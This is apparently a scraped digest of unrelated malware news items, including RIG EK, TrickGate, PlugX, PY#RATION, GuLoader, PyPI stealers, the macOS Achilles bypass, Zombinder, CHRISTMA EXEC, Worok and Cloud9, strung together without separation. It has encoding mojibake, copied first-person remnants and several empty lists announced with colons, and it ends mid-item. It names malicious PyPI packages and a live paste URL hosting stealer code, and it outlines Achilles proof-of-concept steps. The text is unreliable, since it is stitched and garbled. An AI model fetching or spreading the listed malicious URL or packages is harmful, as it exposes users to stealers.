Malware comes in many forms: the unwanted programs can surface as pathogens, spies, or remote controls in computers. Whether itâs a virus, spyware, or a Trojan horse, this harmful software should be kept well away from your computer. What are the different types of malware? We show you how to protect yourself from them and what steps to take if your computer or webspace are affected.
The RIG exploit kit (EK) touched an all-time high successful exploitation rate of nearly 30% in 2022, new findings reveal.
“RIG EK is a financially-motivated program that has been active since 2014,” Swiss cybersecurity company PRODAFT said in an exhaustive report shared with The Hacker News.
“Although it has yet to substantially change its exploits in its more recent activity, the type and version of the malware they distribute constantly change. The frequency of updating samples ranges from weekly to daily updates.”
Exploit kits are programs used to distribute malware to large numbers of victims by taking advantage of known security flaws in commonly-used software such as web browsers.
The fact that RIG EK runs as a service model means threat actors can financially compensate the RIG EK administrator for installing malware of their choice on victim machines. The RIG EK operators primarily employ malvertising to ensure a high infection rate and large-scale coverage.
As a result, visitors using a vulnerable version of a browser to access an actor-controlled web page or a compromised-but-legitimate website are redirected using malicious JavaScript code to a proxy server, which, in turn, communicates with an exploit server to deliver the appropriate browser exploit.
The exploit server, for its part, detects the user’s browser by parsing the User-Agent string and returns the exploit that “matches the pre-defined vulnerable browser versions.”
“The artful design of the Exploit Kit allows it to infect devices with little to no interaction from the end user,” the researchers said. “Meanwhile, its use of proxy servers makes infections harder to detect.”
Since arriving on the scene in 2014, RIG EK has been observed delivering a wide range of financial trojans, stealers, and ransomware such as AZORult, CryptoBit, Dridex, Raccoon Stealer, and WastedLoader. The operation was dealt a huge blow in 2017 following a coordinated action that dismantled its infrastructure.
Packers are becoming an increasingly important tool for cybercriminals to use in the commission of illegal acts. On hacker forums, the packer is sometimes referred to as âCrypterâ and âFUD.â Its primary function is to make it more difficult for antivirus systems to identify malicious code. Malicious actors are able to disseminate their malware more quickly and with fewer consequences when they use a packer. It doesnât matter what the payload is, which is one of the primary qualities of a commercial Packer-as-a-Service, which implies that it may be used to pack a variety of different harmful samples. This opens up a lot of opportunities for cybercriminals. Another key quality of the packer is that it is transformational. Because the packerâs wrapper is changed on a frequent basis, it is able to avoid detection by devices designed to enhance security.
According to Checkpoint, TrickGate is an excellent illustration of a robust and resilient packer-as-a-service. It has been able to go under the radar of cyber security researchers for a number of years and is consistently becoming better in a variety of different ways.
Although a lot of very good study was done on the packer itself, TrickGate is a master of disguises and has been given a number of different titles due to the fact that it has so many different characteristics. A number of names have been given to it, including âTrickGate,â âEmotetâs packer,â ânew loader,â âLoncom,â and âNSIS-based crypter.â
At the end of 2016, they made our first observation of TrickGate. During that time, it was used to spread the Cerber malware. Since that time, they have been doing ongoing research on TrickGate and have discovered that it is used to propagate many forms of malicious software tools, including ransomware, RATs, information thieves, bankers, and miners. It has come to their attention that a significant number of APT organizations and threat actors often employ TrickGate to wrap their malicious code in order to evade detection by security solutions. Some of the most well-known and top-distribution malware families have been wrapped by TrickGate,
including Cerber, Trickbot, Maze, Emotet, REvil, CoinMiner, Cobalt Strike, DarkVNC, BuerLoader, HawkEye, NetWire, AZORult, Formbook, Remcos, Lokibot, AgentTesla, and many more. TrickGate has also been involved in the wrapping of many other malware.
PlugX malware has been around for almost a decade and has been used by multiple actors of Chinese nexus and several other cybercrime groups.
The Palo Alto Networks Unit 42 incident response team has discovered a new variant of PlugX malware that is distributed via removable USB devices and targets Windows PCs. This should not come as a surprise since 95.6% of new malware or their variants in 2022 targeted Windows.
According to Unit 42 researchers, the new variant was detected when carrying out an incident response post a Black Basta ransomware attack. The researchers uncovered several malware samples and tools on the victimsâ devices. This includes the Brute Ratel C4 red-teaming tool, GootLoader malware, and an old PlugX sample.
PlugX malware has been around for almost a decade and has been used by multiple actors of Chinese nexus and several other cybercrime groups. The malware was previously used in many high-profile cyberattacks, such as the 2015 U.S. Government Office of Personnel Management (OPM) breach.
The same backdoor was also used in the 2018 malware attack on the Android devices of minority groups in China. Most recently, in November 2022, researchers linked Google Drive phishing scams to the group infamously known for using PlugX malware.
Scope of Infection
The new variant stood out among other malware because it could infect any attached removable USB device, e.g., floppy, flash, thumb drives, and any system the removable device was plugged into later.
So far, no evidence connects the PlugX backdoor or Gootkit to the Black Basta ransomware group, and researchers believe another actor could have deployed it. Moreover, researchers noted that the malware could copy all Adobe PDF and Microsoft Word documents from the host and places them in a hidden folder on the USB device. The malware itself creates this folder.
Malware Analysis
Unit 42 researchers Jen Miller-Osborn and Mike Harbison explained in their blog post that this variant of PlugX malware is a wormable, second-stage implant. It infects USB devices and stays concealed from the Windows operating file system. The user would not suspect that their USB device is being exploited to exfiltrate data from networks.
PlugXâs USB variant is different because it uses a specific Unicode character called non-breaking space/ U+00A0 to hide files in a USB device plugged into a workstation. This character prevents the Windows OS from rendering the directory name instead of leaving an anonymous folder in Explorer.
Furthermore, the malware can hide actor files in a removable USB device through a novel technique, which even works on the latest Windows OS.
The malware is designed to infect the host and copy the malicious code on any removable device connected to the host by hiding it in a recycle bin folder. Since MS Windows OS by default doesnât show hidden files, the malicious files in recycle bin arenât displayed, but, surprisingly, it isnât shown even with the settings enabled. These malicious files can be viewed/downloaded only on a Unix-like OS or through mounting the USB device in a forensic tool.
The malware features also include file transfer, keylogging, stealing passwords stored in the browser, clipboard data stealing, cookies exfiltration and more.
Threat analysis firm Securonixâs cybersecurity researchers have discovered a new malware dubbed PY#RATION allowing attackers to steal sensitive files and log keystrokes from impacted devices.
Malware Distribution Technique
The malware is distributed through a conventional phishing mechanism in which the email contains a password-protected ZIP archive. When it is unpacked, two shortcut image files appear, titled front.jpg.lkn and back.jpg.lnk. When launched, these files display the front and back of a driverâs license that doesnât exist.
With this, the malicious code is also executed, leading to two new files being downloaded from the internet. These files are titled front.txt and back.txt, later renamed to .bat docs and executed. The malware disguises itself as Cortana virtual assistant to ensure persistence on the system.
What is PY#RATION
PY#RATION is a Python-based malware that displays a RAT (remote access trojan) like behaviour to sustain control over the affected host. The malware has various capabilities and functionalities, such as keylogging and data exfiltration.
However, the unique aspect is that it uses WebSocket for exfiltration and C2 communication, and evades detection from network security solutions and antivirus programs. Leveraging Pythonâs built-in Socket.IO framework that facilitates client and server WebSocket communications, the malware pulls data and gets commands over a single TCP connection through open ports simultaneously.
Moreover, according to a blog post published by Securonix, the attackers use the same C2 address, which the IPVoid checking system is yet to block. Researchers believe this malware is still under active development as they have detected multiple versions since August 2022. The malware receives instructions from the operations through WebSocket and obtains sensitive data.
Potential Dangers
This Python RAT is packed into an executable that uses automated packers such as âpyinstallerâ and âpy2exeâ to convert Python code into Windows executables. This helps inflate payload size (The first detected version 1.0 being 14MB and the last detected version 1.6.0 being 32 MB containing 1000+ lines and additional code).
Researchers claim that the latest version of the payload remains undetected by all except for one antivirus engine listed on VirusTotal.
The malware features include file transfer to and from the C2 server, network enumeration, shell command execution, keylogging, stealing passwords stored in the browser, host enumeration, clipboard data stealing, and cookies exfiltration. Whoâs behind this campaign, the distribution volume, and campaign objectives are still unclear.
The FBI has recently warned the public about search engine ads pushing malware disguised as legitimate software â an old tactic that has lately resulted in too many malicious ads served to users searching for software, cracked software, drivers â anything that can be downloaded, really â via Google and Bing.
The recent explosion of search engine malvertising
Malware peddlers employ a variety of methods to deliver their wares to unsuspecting users:
Malicious links or attachments served via email and messages, or posts on social media, online forums and IM groups
The latter tactic is particularly good at hitting a wide pool of potential targets, since most internet users also use search engines.
Lately, though, they have been overdoing it â or perhaps itâs just that more people have begun noticing it and talking about it online?
Many documented campaigns
HP threat researcher Patrick SchlĂ€pfer says that they have seen âa significant increase in malware distributed through malvertising, with multiple threat actors currently using this technique.â
Some of these campaigns have been going on since late last year, and mostly target users searching to download popular software (e.g., Audacity, Blender 3D, GIMP, Notepad++, Microsoft Teams, Discord, Microsoft OneNote, 7zip, OBS, etc.).
The malicious ads often manage to be the first link users see when searching for software on Google, and point to a (usually typosquatting) domain that resembles the original software manufacturerâs page. Clicking on the download link triggers the download of the malicious package from a file-hosting and sharing service (e.g., Dropbox), an app development platform (e.g., Google Firebase), or a code-hosting service (e.g., GitHub).
Protect yourself and your loved ones
While Google and Microsoft are trying to keep their users safe, itâs becoming obvious that they are failing to keep pace with the rapid change of tricks employed by cybercriminals to push those ads.
As some ads are removed and new ones inevitably spring up, we are forced to do what we can to protect themselves.
Just being aware of this danger and knowing about the prevalence of these malicious ads will help. Also, carefully check whether the URL to which the advertisement points is the correct one (e.g., by comparing it with the official domain listed on the softwareâs Wikipedia page).
If you fail to spot the malicious nature of the ad and the typosquatting site, donât ignore warnings you might get from Microsoft Defender or another security solution you use.
But the best advice may be to completely avoid clicking on Google and Bing ads â either by recognizing them and avoiding them consciously, or by installing an ad-blocking extension that will stop those ads from being displayed. That latter option is perhaps the best one for less tech-savvy users, to completely remove the temptation of willy-nilly clicking on potentially malicious ads â wherever they might pop up.
Google and Microsoft, on the other hand, may want to ramp up their efforts to block this kind of abuse of their ad network, or risk their reputation being dented and more and more users start using ad blockers.
Malware analysis tools are highly essential for Security Professionals who always need to learn many tools, techniques, and concepts to analyze sophisticated Threats and current cyber attacks.
Malware Analysis Tools & Courses
Malware Analysis Courses
Hex Editors
Disassemblers
Detection and Classification
Dynamic Binary Instrumentation
Dynamic Analysis
Deobfuscation
Debugging
Malware Analaysis Courses
Reverse Engineering
Binary Analysis
Decompiler
Bytecode Analysis
Reconstruction
Memory Forensics
Windows Artifacts
Storage and Workflow
Malware samples
Courses
Domain Analysis
Books
Malware Analysis Courses
Here we have listed the best courses list for malware analysis, reverse engineering, exploit development and more..
A hex editor (or binary file editor or byteeditor) is a type of computer program that allows for manipulation of the fundamental binary data that constitutes a computer file. The name âhexâ comes from âhexadecimalâ: a standard numerical format for representing binary data.
A disassembler is a computer program that translates machine language into assembly languageâthe inverse operation to that of an assembler.
A disassembler differs from a decompiler, which targets a high-level language rather than an assembly language. Disassembly, the output of a disassembler, is often formatted for human-readability rather than suitability for input to an assembler, making it principally a reverse-engineering tool.
This introductory malware dynamic analysis class is dedicated to people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected via various tools.
The class will be a hands-on class where students can use various tools to look for how malware is: Persisting, Communicating, and Hiding
WinDbgâ multipurpose debugger for the Microsoft Windows computer operating system, used to debug user mode applications, device drivers, and the kernel-mode memory dumps.
X64dbgâ An open-source x64/x32 debugger for windows.
Binary Format and  Binary Analysis
The Compound File Binary Format is the basic container used by several different Microsoft file formats such as Microsoft Office documents and Microsoft Installer packages.
A decompiler is a computer program that takes an executable file as input, and attempts to create a high level source file which can be recompiled successfully. It is therefore the opposite of a compiler, which takes a source file and makes an executable.Generic Decompiler
Metadefender.com â Scan a file, hash or IP address for malware (free).
NetworkTotal â A service that analyzes pcap files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware using Suricata configured with EmergingThreats Pro.
Noriben â Uses Sysinternals Procmon to collect information about malware in a sandboxed environment.
Aleph â Open Source Malware Analysis Pipeline System.
CRITs â Collaborative Research Into Threats, a malware and threat repository.
FAME â A malware analysis framework featuring a pipeline that can be extended with custom modules, which can be chained and interact with each other to perform end-to-end analysis.
Analyze malicious JS and shellcode from PDFs and Office documents. See also the browser malware section.
AnalyzePDFâ A tool for analyzing PDFs and attempting to determine whether they are malicious.
box-js â A tool for studying JavaScript malware, featuring JScript/WScript support and ActiveX emulation.
diStormâ Disassembler for analyzing malicious shellcode.
JS Beautifier â JavaScript unpacking and deobfuscation.
JS Deobfuscator â Deobfuscate simple Javascript that use eval or document.write to conceal its code.
libemu â Library and tools for x86 shellcode emulation.
malpdfobjâ Deconstruct malicious PDFs into a JSON representation.
OfficeMalScanner â Scan for malicious traces in MS Office documents.
olevba â A script for parsing OLE and OpenXML documents and extracting useful information.
Origami PDFâ A tool for analyzing malicious PDFs, and more.
PDF Tools â pdfid, pdf-parser, and more from Didier Stevens.
PDF X-Ray Liteâ A PDF analysis tool, the backend-free version of PDF X-RAY.
peepdf â Python tool for exploring possibly malicious PDFs.
QuickSand â QuickSand is a compact C framework to analyze suspected malware documents to identify exploits in streams of different encodings and to locate and extract embedded executables.
Spidermonkeyâ Mozillaâs JavaScript engine, for debugging malicious JS.
Practice Malware Analysis ToolsÂ
Practice Reverse Engineering. Be careful with malware.
RPISEC Malware Analysis â These are the course materials used in the Malware Analysis course at at Rensselaer Polytechnic Institute during Fall 2015.
/r/ReverseEngineeringâ Reverse engineering subreddit, not limited to just malware.
Credits
This list is Created with helping of following Awesome Peoples.
Lenny Zeltser and other contributors for developing REMnux.
Michail Hale Ligh, Steven Adair, Blake Hartstein, and Mather Richard for writing the Malware Analystâs Cookbook, which was a big inspiration for creating the list;
An advanced malware downloader named GuLoader has recently been exposed by cybersecurity researchers at CrowdStrike. This advanced downloader has the capability to evade the detection of security software by adopting a variety of techniques.
While analyzing the shellcode of GuLoader, a brand-new anti-analysis technique was discovered by CrowdStrike through which researchers would be able to identify if the malware is operating in an adversarial environment or not. While this is done by examining the whole process memory for any VM-related strings.
Evolution of GuLoader Malware
On infected machines, GuLoader (aka CloudEyE) distributes remote access trojans like AgentTesla, FormBook, Nanocore, NETWIRE, Remcos, and the Parallax RAT using the VBS downloader.
GuLoader has been active since at least 2019 and has undergone several changes in its functionality and delivery methods. Over time, the malware has become more sophisticated, using various methods to evade detection and avoid being removed from infected systems.
It has also been distributed through other channels, such as exploit kits and hacked websites. While it has evolved over time and has been used in various campaigns to deliver a range of malware, including ransomware, banking Trojans, and other types of malware.
A strong anti-analysis technique was also deployed by GuLoader in order to avoid detection in order to remain undetected.
GuLoader exhibits a three-stage process, the VBScript script will first inject the shellcode embedded within it into the memory, then the next stage of the process will execute anti-analysis checks that will protect the code from being analyzed.
Furthermore, the shellcode also incorporates the same anti-analysis methods in order to avoid detection by third parties. It is through this shellcode that an attacker is able to download a final payload of their choice and execute it with the same anti-analysis methods as the original shellcode on the host that is compromised.
Detecting breakpoints used for code analysis is done with anti-debugging and anti-disassembling checks in the malware.
There is also a redundant code injection mechanism that can be used to avoid the use of a NTDLL.dll hook that is commonly used by antivirus programs and EDRs.
In order to detect and flag processes on Windows that may be suspicious, anti-malware engines use NTDLL.dll API hooking.
Anti-Analysis Techniques
Here below we have mentioned the anti-analysis techniques used:-
Anti-Debugging
Anti-Virtual Machine
Process Hollowing
It was pointed out by experts that GuLoader remains a treacherous threat that is constantly evolving as it continues to develop. Furthermore, experts also provided indicators of compromise for the latest version of the downloader, as well as other key information.
Researchers at Phylum recently discovered that hackers had been injecting information stealer malware into Python developersâ machines in order to steal their information.
As they dug deeper, they discovered a new stealer variant with many different names. While apart from this, the source code of the program reveals that it is a straightforward copy of the old Stealer, W4SP.
Attack Chainto Deploy Malware
A stealer in this case dropped directly into the main.py file rather than obfuscating the code or being obvious about the attempts to escape detection.
Only one instance has been found in which multiple stages were used in order to obfuscate and obscure the attackerâs intentions. In this case, the attacker used a package called chazz to pull obfuscated code from the klgrth.io website, using a simple first stage to get it.
There is a great deal of similarity between the first stage of the stealer code and the injector code. While this has been obfuscated with BlankOBF, itâs an obfuscation program. As soon as it is de-obfuscated, it reveals the Leaf $tealer.
Malicious Packages
Listed below are packages that feature similar IOC and apart from this, what we can expect is this list will grow over the coming months and years:-
modulesecurity â âCelestial Stealerâ
informmodule â âLeaf $tealerâ
chazz â first stage that pull from https://www.klgrth.io/paste/j2yvv/raw which contains the obfuscated code shown above
randomtime â âANGEL stealerâ
proxygeneratorbil â â@skid STEALERâ
easycordey â â@skid Stealerâ
easycordeyy â â@skid Stealerâ
tomproxies â â@skid STEALERâ
sys-ej â âHyperion Obfuscated codeâ
infosys â â@734 Stealerâ
sysuptoer â âBulkFA Stealerâ
nowsys â âANGEL Stealerâ
upamonkws â âPURE Stealerâ
captchaboy â â@skid STEALERâ
proxybooster â âFade Stealerâ
W4SP Copies
W4SPâs original publication in loTusâs repository has been disabled by GitHub staff due to the violation of the T&C of GitHub, and as a result, it will be not found anymore.
It has been Phylumâs mission for some time to monitor the actions of these threat actors in an attempt to finally bring down their infrastructure, due to their persistent, pervasive, and egregious nature.
It was discovered that several copies of W4SP-Stealer started flashing under different names as soon as the repo for W4SP-Stealer was removed. This new stealer is even being distributed through PyPI by threat actors already, which is a sign that it is becoming a real threat.
It has been discovered that W4SP has been hosted in two GitHub repositories under two different aliases, each with its own purpose.
Satan Stealer
angel-stealer
There is a copy of the original source here, as well as the earlier versions of W4SP, hosted in an account titled aceeontop.Â
W4SP Stealer will likely remain part of the scene for quite some time to come, as will their imitations and other variants.
There will be a constant increase in their number of attempts, their persistence, and their sophistication as time passes. However, Phylum ensured that it would mitigate and block supply chain attacks since its platform is capable enough in doing so.
Microsoft disclosed technical details of a vulnerability in Apple macOS that could be exploited by an attacker to bypass Gatekeeper.
Microsoft has disclosed details of a now-fixed security vulnerability dubbed Achilles (CVE-2022-42821, CVSS score: 5.5) in Apple macOS that could be exploited by threat actors to bypass the Gatekeeper security feature.
The Apple Gatekeeper is designed to protect OS X users by performing a number of checks before allowing an App to run. In fact, you will not be able to execute code that wasnât signed by an Apple developer, you will not be able to run apps that werenât downloaded from Appleâs store if the device is not jailbreaked of course.
The flaw was discovered on July 27, 2022, by Jonathan Bar Or from Microsoft, it is a logic issue that was addressed with improved checks.
âOn July 27, 2022, Microsoft discovered a vulnerability in macOS that can allow attackers to bypass application execution restrictions imposed by Appleâs Gatekeeper security mechanism, designed to ensure only trusted apps run on Mac devices. We developed a proof-of-concept exploit to demonstrate the vulnerability, which we call âAchillesâ.â reads the post published by Microsoft.
Microsoft researchers explained that Gatekeeper bypasses can be used by threat actors to install malware on macOS systems.
The experts pointed out that Appleâs Lockdown Mode introduced in July does not prevent the exploitation of the Achilles bug.
The Achilles vulnerability relies on the Access Control Lists (ACLs) permission model to add extremely restrictive permissions to a downloaded file (i.e., âeveryone deny write, writeattr, writeextattr, writesecurity, chownâ), to block the Safari browser from setting the quarantine extended attribute.
Below is the POC developed by Microsoft:
Create a fake directory structure with an arbitrary icon and payload.
Create an AppleDouble file with the com.apple.acl.text extended attribute key and a value that represents a restrictive ACL (we chose the equivalent of âeveryone deny write,writeattr,writeextattr,writesecurity,chownâ). Perform the correct AppleDouble patching if using ditto to generate the AppleDouble file.
Create an archive with the application alongside its AppleDouble file and host it on a web server.
Malware attacks are a growing problem in our increasingly digital world. By infiltrating computers and networks, malicious software can cause serious harm to those affected by it.
One of the most common types of malware is ransomware (encryption-based malware), which prevents users from accessing their files until they pay a hefty fee to the cyber attacker. This type of attack has been used to target everything from individuals to large organizations, including government agencies and healthcare providers.
In addition to financial losses, malware attacks can have devastating effects on businesses and individuals. In some cases, sensitive data can be stolen or destroyed as part of an attack. This can lead to identity theft and other forms of fraud, as well as put organizations at risk for long-term damage if confidential information is exposed or compromised.
Research Findings
A recent study by Atlas VPN shows how malware infection is on the rise and the trends in the new malware samples found in the first three quarters of 2022.
According to researchers, 59.58 million samples of new Windows malware were found in the first three quarters of 2022 and these make up 95.6% of all new malware discovered during that time period.
This analysis was based on data by AV-TEST GmbH, an independent organization that evaluates and rates antivirus and supplies services in IT Security and Antivirus Research. The study also includes new malware samples detected in the four quarters of 2021 and the first three quarters of 2022.
Windows, Linux, and Android Malware
Overall, there is a downward trend in the data with the malware samples this year has decreased by 34% as compared to the same period last year. However, the numbers are still exceptionally high.
Following Windows on the list is Linux malware with 1.76 million new malware samples â 2.8% of the total malware threats in 2022.
Android malware takes third place with the first three quarters of 2022 seeing 938,379 new Android malware threats, constituting 1.5% of the total new malware.
Lastly, 8,329 samples of never before seen malware threats aimed at macOS were observed in the same period.
Total Number of Malware
The study also shows that the total number of malware threats found in the first three quarters of 2022 across all operating systems amount to 62.29 million. This is about 228,164 malware threats daily.
If we make a quarter-by-quarter comparison, the first quarter of 2022 saw the most significant number of malware samples â 22.35 million. However, this number dropped by 4% to 21.49 million in the second quarter of this year. Again, it decreased by another 14% to 18.45 million.
The numbers continue to plummet into the fourth quarter of the year with 7.62 million new threats found in October and November â nearly 60% less than at the same time last year.
Protection Against Malware
Malware is a pervasive threat to internet users on both personal and professional networks. It can cause serious damage to computers, networks, and data that can be expensive to fix. Fortunately, there are steps you can take to protect yourself from malware.
The most important step in protecting your network from malware is keeping your anti-malware software up to date. Regularly updating anti-malware programs ensures that theyâre able to detect the latest threats and keep them away from your computer or network.
Additionally, be sure not to click on suspicious links or download files from unknown sources as these could contain malicious code that could harm your system.
Another way to stay safe online is by using a secure web browser with built-in security features like pop-up blockers, phishing protection, and ad blockers ((donât use it on Hackread.com though :0)) for enhanced protection against malicious activities.
ThreatFabricâs security researchers have reported a new dark web platform through which cybercriminals can easily add malware to legitimate Android applications.
Dubbed Zombinder, this platform was detected while investigating a campaign in which scammers were distributing multiple kinds of Windows and Android malware, including Android banking malware like Ermac, Laplas âclipper,â Erbium, and the Aurora stealer, etc.
This comes just days after a new dark web marketplace called InTheBox surfaced online, serving smartphone malware developers and operators.
Further probe helped researchers trace the adversary to a third-party dark web service provider called Zombinder. It was identified as an app programming interface binding service launched in March 2022.
According to ThreatFabricâs blog post, numerous different threat actors are using this service and advertising it on hacker forums. On one such forum, the service was promoted as a universal binder that binds malware with almost any legitimate app.
The campaign is designed to appear as it helps users access internet points by imitating the WiFi authorization portal. In reality, it pushes several different malware strains.
What does Zombinder Do?
In the campaign detected by ThreatFabricâs researchers, the service is distributing the Xenomorph banking malware disguised as the VidMate app. It is distributed via modified apps advertised/downloaded from a malicious website mimicking the applicationâs original website. The victim is lured to visit this site via malicious ads.
The Zombinder-infected app works just as it is marketed while the malicious activity carries on in the background and the victim stays unaware of the malware infection.
At the moment, Zombinder is focusing entirely on Android apps but the service operators are offering Windows apps binding services. Those who downloaded the infected Windows app were delivered the Erbium stealer as well. It is an infamous Windows malware distributed to steal stored passwords, cookies, credit card details, and cryptocurrency wallet data.
It is worth noting that two downloaded buttons on the malicious websiteâs landing page, one for Windows and the other for Android. when a user clicks on the Download for Windows button, they are delivered malware designed for Microsoft operating system, including Aurora, Erbium, and Laplas clipper. Conversely, the Download for Android button distributes the Ermac malware.
How to Stay Protected?
If you want to stay safe, do not sideload apps even if you are desperate to make a specific product work. Also, avoid installing apps from unauthentic or unknown sources onto your Android mobile phone and rely on legitimate sources such as Google Play Store, Amazon Appstore, or Samsung Galaxy Store. Always check the appâs rating, and reviews, and check out the app developersâ website before installing a new app.
Forget Sergeant Pepper and his Lonely Hearts Club Band, who taught the band to play a mere 20 years ago today.
December 2022 sees the 35th anniversary of the first major self-spreading computer virus â the infamous CHRISTMA EXEC worm that temporarily crushed the major mainframe networks of the dayâŠ
⊠not by any deliberately coded side-effects such as file scrambling or data deletion, but simply by leeching too much network bandwidth for its own unauthorised purpose.
As a decoy to disguise the fact that it read in the 1980s IBM equivalents of your email address book (NAMES) and your known-hosts file (NETLOG) in order to find as many new recipients of the malware as possible to send itself to, the malware displayed this:
*
*
***
*****
*******
*********
************* A
*******
*********** VERY
***************
******************* HAPPY
***********
*************** CHRISTMAS
*******************
*********************** AND MY
***************
******************* BEST WISHES
***********************
*************************** FOR THE NEXT
******
****** YEAR
******
If youâre wondering why the virus is widely known as CHRISTMA EXEC, rather than by the full word CHRISTMASâŠ
âŠthatâs because filenames were limited to eight characters, which could be followed by a space and what we would today call an âextensionâ of EXEC in order to turn them into scripts that could be run directly by the user â executed, in technical jargon.
The virus itself was written in IBMâs powerful text-based scripting language REXX (the resoundingly named Restructured Extended Executor), so a non-programmer looking at the message would probably recognise it as âprogram codeâ, and therefore tend to ignore it as unimportant and irrelevant, for all that it might look interesting.
Except that the author of the virus found a cheerful way to embed an instructional lure right into the code itself, which starts with a remark (as in the C language, text between /* and */ in REXX programs is treated as a comment and ignored when the file gets used)âŠ
/*********************/
/* LET THIS EXEC */
/* */
/* RUN */
/* */
/* AND */
/* */
/* ENJOY */
/* */
/* YOURSELF! */
/*********************/
âŠand then offers the following cheery advice to non-techies:
/* browsing this file is no fun at all
just type CHRISTMAS from cms */
CMS is short for Conversational Monitor System, a command prompt environment on top of IBMâs venerable VM/370 operating system and its many variants, which offered individual users a real-time virtual machine that behaved like a computer all of their own, with its own disk space for storing personal files and programs.
Handily, the user didnât have to be taught to leave the final -S off the word CHRISTMAS, because CMS would automatically ignore any extra characters and hunt for CHRISTMA EXEC, which was the very script program that the user had just received without expecting it or asking for it.
As stated above, the code did indeed display the Christmas Tree ASCII art â or, more precisely, EBCDIC art, given that IBM famously had its own character encoding system known as Extended Binary Coded Decimal Interchange Code (pronounced ebb-si-dick).
But it also trawled through your NAMES and NETLOG files, which listed other users and computers you regularly contacted, and copied itself to all of them, so that for every user who innocently typed CHRISTMAS at the command promptâŠ
âŠa sea of copies of the virus (20? 50? 200?) would be distributed, potentially worldwide, and if any of those recipients (20? 50? 200?) innocently typed CHRISTMAS at the command promptâŠ
âŠa sea of copies of the virus would be distributed, and so on, and so on.
[This is j]ust like modern macro malware that says to the user, âHey, macros are disabled, but for your âextra safetyâ you need to turn them back on⊠why not click the button? Itâs much easier that way.â
35 years ago, malware writers had already figured out that if you ask users nicely to do something that is not at all in their interest, some of them, possibly many of them, will do it.
Recently, the cybersecurity researchers of Sucuri have found that threat actors are conducting a tremendous massive black hat search engine optimization (SEO) campaign.
However, nearly 15,000 websites redirected visitors to participate in fake Q&A discussion forums in this campaign. Over the course of September and October, the SiteCheck scanner of Sucuri detected over 2,500 redirects to other sites.
Not only this, but the experts have also stated that each and every compromised site contains nearly 20,000 files. All these files were being used as a part of the malicious campaign, which was being carried out by the threat actors, and most of the sites were WordPress.
Malicious ois[.]is Redirects
According to the securi report, After detecting the malware, the experts conducted a brief survey and found that some of the websiteâs malware infections generally limit themselves to a smaller number of files.
Not only this, but they also limit their footprint so that they can avoid detection and carry out their operations properly.
A website infected with this malware will, on average, have over 100 files infected; thatâs why this malware is completely different from others.
Common Infected Files
This malware is most commonly found infecting core files of WordPress, and it has also been found to infect â.phpâ files that were created by unrelated malware campaigns.
The following is a list of the top 10 most commonly infected files:-
The Worok threat infects victimsâ computers with information-stealing malware by concealing malware within PNG images with the help of the Steganography technique, which makes it very difficult to detect by malware scanners.
The finding has substantiated one of the most crucial links in the chain of infection of the threat actor as claimed by the experts at Avast. These malicious PNG images are used by threat actors to conceal a payload that facilitates information theft under the guise of being an image.
In the past couple of months, ESET has been revealing details of attacks that Worok has been launching against several high-profile companies and local government agencies in the following regions:-
Middle East
Southeast Asia
South Africa
There are tactical overlaps between Worok and a Chinese threat actor known as TA428 that is believed to be sharing similar tactics.
Compromise Chain
Steganography is a technique that hides scripts within PNG images, such as the compromise series of Worok, which utilizes a C++-based loader which is known as âCLRLoad.â
As of right now, we do not know what vector was used in the initial attack. As part of certain intrusions, the malware was also deployed on Microsoft Exchange Server by exploiting the ProxyShell vulnerability.
A custom malicious kit was then deployed by the attackers using publicly available exploit tools that were available for free. Therefore, the final compromise chain can be summarized as follows:-
First, CLRLoader is implemented, where simple code is implemented to load the PNGLoader, which is the second stage in the process.
In order to decode the malicious code possessed within the image, the PNGLoad comes in two different variants. While doing so, they launch either the following payloads:-
PowerShell script
.NET C#-based
It has been difficult for PowerShell to find the script and they have recently discovered a new malware called DropboxControl, which is spyware that steals information from the system. Provide the threat actor with the ability to upload, download, and run commands contained in specific files.
Malware in PNG Files
When a viewer of an image is opened to view the steganographic code within it, it appears as if the image file is normal.
An image was encoded in a way that allows malicious code to be embedded in the least significant bits of each pixel in the image using a technique known as âleast significant bitâ (LSB) encoding.
No matter how the third-stage implant is deployed, it is clear that Worok has intelligence-gathering objectives that go beyond simply harvesting files of interest.
Worok attacks have been prompted by tools that are not circulating in the wild. Therefore, itâs likely that these tools are used by the group themselves exclusively to conduct attacks.
Indicators of Compromise
PNG file with steganographically embedded C# payload
Researchers at Zimperium zLabs recently identified a new Chrome browser botnet called âCloud9â that is intent on stealing the following information using malicious extensions:-
This method is becoming increasingly attractive for malware developers to target web browsers as they contain the most valuable information about a user.
In the course of everyday activities, we can find out a lot about ourselves through our keystrokes or session cookies. A breach of security or a violation of privacy can be caused by having access to such information.
Cloud9 botnet is a RAT that affects all Chromium-based web browsers, which are popular among consumers like Chrome and Microsoft Edge. Moreover, threat actors could exploit this RAT to remotely execute arbitrary commands.
Technical Analysis
The official Chrome web store doesnât host this malicious Chrome extension, so it cannot be downloaded from there.Â
The distribution channel of this malware relies on communities that are operated by threat actors, wherein the malware will be hidden by users of the tool before it gets delivered to the victims by the tool itself.
In terms of the Javascript files that make up the extension, there are only three. While the primary functionality of the extension can be located in a file called âcampaign.jsâ which contains most of its functionality.
According to the report, During the initialization of campaign.js, the window.navigator API is used to identify the systemâs operating system. Once the target has been identified, a Javascript file is injected into the victimâs computer system as a method to mine cryptocurrency using the resources of the victimâs computer system.
Next, for further proceedings, it injects another script known as cthulhu.js which comprises a full-chain exploit for the following flaws:-
CVE-2019-11708 (Firefox)
CVE-2019-9810 (Firefox)
CVE-2014-6332 (Internet Explorer)
CVE-2016-0189 (Internet Explorer)
CVE-2016-7200 (Edge)
As soon as the vulnerabilities are exploited, Windows malware is automatically installed on the host machine and executed. This gives attackers even more opportunities to compromise systems and carry out even more severe malware attacks.
While one of the sophisticated inclusion of this malware is âClipper,â a module that keeps scanning the clipboard of the system for copied data like:-
Passwords
Credit cards details
In addition to injecting ads into webpages silently, Cloud9 is also capable of generating revenue for its operators by generating ad impressions.
During recent research, Microsoft has discovered evidence of a complex interconnected malware ecosystem that is associated with the Raspberry Robin worm.
With other malware families, there are several root links to the Raspberry Robin worm were identified. Even security experts have detected that it uses alternate infection tactics as well.
Infections like these lead to a variety of complications and here below we have listed them:-
Hands-on-keyboard attacks: When attackers are already inside your environment following a breach, a hands-on keyboard attack will occur. It is a two-sided operation; on one end itâs the cybercriminal who sits at a keyboard, while on the other side itâs your compromised network that is being accessed.
